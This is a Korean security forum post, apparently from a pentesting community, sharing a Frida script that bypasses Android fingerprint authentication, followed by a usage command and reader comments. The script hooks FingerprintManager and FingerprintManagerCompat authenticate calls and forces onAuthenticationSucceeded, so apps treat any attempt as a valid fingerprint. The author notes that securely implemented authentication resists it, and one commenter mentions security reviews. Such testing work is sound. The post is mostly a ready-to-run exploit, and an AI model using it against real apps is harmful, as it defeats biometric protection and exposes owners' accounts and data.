FingerPrint Authentication Bypass (지문인증우회)

홈 > 안드로이드 > 안드로이드
안드로이드

FingerPrint Authentication Bypass (지문인증우회)

1 쥬스 9 226 2

지문인증 우회 스크립트입니당 ;)

fee79918380070f869cb6e515724bfd1_1573131008_7709.png


Usage : frida -U -f [package] -l [script.js] --no-pause

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
console.error("[!] Enjoy the hook! - Juice :)");
Java.perform(function () {
 
    console.log('\n');
    
    var FingerprintManager = Java.use('android.hardware.fingerprint.FingerprintManager');
    var FingerprintManagerCompat = Java.use("android.support.v4.hardware.fingerprint.FingerprintManagerCompat");
 
    FingerprintManager.authenticate.overload('android.hardware.fingerprint.FingerprintManager$CryptoObject''android.os.CancellationSignal''int''android.hardware.fingerprint.FingerprintManager$AuthenticationCallback''android.os.Handler').implementation = function(args0, args1, args2, args3, args4){
        console.warn("[!] FingerprintManager.authenticate(args0, args1, args2, args3, args4) Hooked!");
        console.log("\t[*] args0 : " + args0);
        console.log("\t[*] args1 : " + args1);
        console.log("\t[*] args2 : " + args2);
        console.log("\t[*] args3 : " + args3);
        console.log("\t[*] args4 : " + args4);
        args3.onAuthenticationSucceeded(null);
        return this.authenticate(args0, args1, args2, args3, args4);
    };
    
    FingerprintManagerCompat.authenticate.overload('android.support.v4.hardware.fingerprint.FingerprintManagerCompat$CryptoObject''int''android.support.v4.os.CancellationSignal''android.support.v4.hardware.fingerprint.FingerprintManagerCompat$AuthenticationCallback''android.os.Handler').implementation = function(args0, args1, args2, args3, args4){
        console.warn("[!] FingerprintManagerCompat.authenticate(args0, args1, args2, args3, args4) Hooked!");
        console.log("\t[*] args0 : " + args0);
        console.log("\t[*] args1 : " + args1);
        console.log("\t[*] args2 : " + args2);
        console.log("\t[*] args3 : " + args3);
        console.log("\t[*] args4: " + args4);
        args3.onAuthenticationSucceeded(null);
        return this.authenticate(args0, args1, args2, args3, args4);
    };    
});
cs


안전하게 구현된 지문인증은 아래와 같이 안됩니당~

fee79918380070f869cb6e515724bfd1_1573131656_9404.png
 



9 Comments
M LIN 11.07 22:24  
오호 좋은 자료 공유 감사합니다
1 쥬스 11.07 22:29  
저야말루 감사하쥬~
S 코드몽키 11.08 00:01  
허...지문인증우회라니 +_+
3 Haclthesoul 11.08 00:20  
오호... 이것도 보안성검토 시 요긴하게 쓰이겠네요! ㅎㅎ
1 쥬스 11.08 08:49  
ios쪽에도 올려놨어요~_~
3 dldldl 11.08 12:37  
지문인증 우회;; ㄷㄷ ㅋㅋㅋㅋ 와 대단하네요.
1 samangepd 11.08 23:40  
좋은자료 감사합니다
1 치킨한마리 11.12 14:38  
좋은 정보 감사드립니다.
6 하늘사자 11.12 20:42  
좋은 정보 감사드립니다.